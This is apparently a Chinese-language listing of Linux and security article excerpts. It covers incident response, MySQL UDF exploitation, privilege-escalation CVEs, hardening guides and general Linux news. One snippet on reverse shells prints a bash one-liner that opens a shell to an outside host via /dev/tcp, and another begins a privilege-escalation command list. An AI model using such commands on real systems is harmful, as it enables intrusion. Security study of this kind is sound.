linux系统的服务器被入侵,总结了以下的基本方法首先先用iptraf查下,如果没装的运行yum install iptraf装下,看里面是不是UDP包发的很多,如果是,基本都被人装了后门 ...
linux Mysql UDF 利用思路详解
在入侵渗透过程中经常会遇到一些孤立的mysql服务器,或者是存在sql注入的web服务器,可以执行我们的命令或者可以直接连接。windows环境中,如果有mysql用户密码,并且允许远程连接,我们可以...
Linux文件系统层中的本地提权漏洞(CVE-2021-33909)
点击上方蓝字关注我们概述Qualys研究人员在Linux内核文件系统层中,发现了一个影响大多数Linux系统的size_t-to-int类型转换漏洞。通过在默认配置中利用此漏洞,任何非特权(本地)用户...
Linux安全配置规范
适用于redhat、suse、fedroa、Linux 操作系统。本规范明确了设备的基本配置安全要求,为设备工程验收和设备运行维护环节明确相关安全要求提供指南。出自公众号:工程师江湖一. ...
Linux本地提权漏洞CVE-2021-3493
漏洞描述OverlayFS漏洞允许Ubuntu下的本地用户获得root权限。Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的...
Python 3.3 为改进代码中的异常处理所做的工作 | Linux 中国
导读:探索异常处理和其他未被充分利用但仍然有用的 Python 特性。 本文字数:4403,阅读时长大约:5分钟https://linux.cn...
linux下反弹shell的方法
Bash [不通用,跟linux发行版本有关,在ubuntu上测试成功]bash -i >& /dev/tcp/10.0.0.1/8080 0>&1PERLperl -e ...
使用 Ansible 配置 Podman 容器 | Linux 中国
导读:在本文中,你将学习如何在 Fedora Linux 上安装、配置 Ansible,以及如何使用它来管理、配置 Podman 容器。本文字数:5177,阅读时长大约:6分钟https:...
使用 Linux 自动化工具提高生产率 | Linux 中国
导读:用 AutoKey 配置你的键盘,纠正常见的错别字,输入常用的短语等等。 本文字数:4579,阅读时长大约:6分钟https://linux.cn...
Linux应急响应
引子总结一篇Linux应急响应的笔记,原因有以下几个。1,就是应急响应本身。2,做溯源不能光是人肉,不论从沦陷的机器来说,还是反溯到傀儡机,都需要应急的能力。3,作为RT,了解了应急的手段,可以更好的...
Linux 提权常用命令集
0x00 操作系统相关操作系统类型版本cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian&nb...
包含新功能和工具的 Linux Mint 20.2 已经发布 | Linux 中国
导读:Linux Mint 20.2 是一次令人兴奋的升级,它有新的应用程序、更新提醒和桌面环境的升级。是时候升级了?本文字数:1228,阅读时长大约:1分钟https://linux.c...
112